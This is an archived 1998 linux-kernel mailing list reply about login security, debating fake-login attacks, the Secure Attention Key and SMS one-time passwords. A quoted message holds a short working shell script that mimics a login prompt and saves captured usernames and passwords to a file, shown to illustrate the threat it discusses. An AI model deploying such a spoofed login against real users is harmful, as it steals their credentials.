[OFFTOPIC] Re: Linux login security approaches

Pavel Machek (pavel@bug.ucw.cz)
Fri, 11 Dec 1998 10:10:54 +0100

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Pavel Machek: "Re: [PATCH] modify console_loglevel from commandline"
Previous message: kuznet@ms2.inr.ac.ru: "Re: UDP bugs"

HI!

> > You have a fundamental flaw in your assumptions, since you don't take into
> > account the fact that unless the security of the system is very badly
> > messed up already, if a user is able to substitute his own program for
> > the normal login/getty, he can also exchange his programs for whatevery
> > else you add to give better "security".
>
> What about just starting (as evil_user, who has an account) the following,
> hiding behind a corner, and wait for another user?
>
> #!/bin/sh
> #
> echo -n "`uname -n` login: "
> read LOGIN
> echo -n "Password: "
> read PW
> echo $LOGIN $PW >> ~/sneaked_passwords.txt
> chmod 0600 ~/sneaked_passwords.txt
> echo "Login incorrect"
> sleep 1
> logout

> (of course, this has to be a text terminal)

Press SAK and be done.

> > <asbestos>
> > The reason why people said your suggestion was the "NT way", is that it
> > makes life harder to everyone trying to use the system, without adding to
> > the actual security of the system.
> > </asbestos>
>
> the most secure way of logging in I have seen so far is the following (I
> helped set it up, kind of, in a firm I jobbed during holidays).
>
> Everyone has a pager or a manager tamagotchi (mobile phone). Logging in
> makes /bin/login send a random string (like from 'pwgen') as e-mail to an
> email<->SMS gateway. A couple seconds later this string pops up on their
> pagers, they enter it. THEN they enter their own (private)
> password.

Ok, so my fake login has to send them email. You _still_ has to press SAK.

> Of course, you will have to have your pager with you, but you get used to
> that. One big advantage is that you will always be warned at once if someone
> tries to log into your account, better yet _from where_ if the terminal id
> is included in this one time SMS password.

Pavel

-- I'm really pavel@atrey.karlin.mff.cuni.cz. Pavel Look at http://atrey.karlin.mff.cuni.cz/~pavel/ ;-).

- To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.rutgers.edu Please read the FAQ at http://www.tux.org/lkml/

Next message: Pavel Machek: "Re: [PATCH] modify console_loglevel from commandline"
Previous message: kuznet@ms2.inr.ac.ru: "Re: UDP bugs"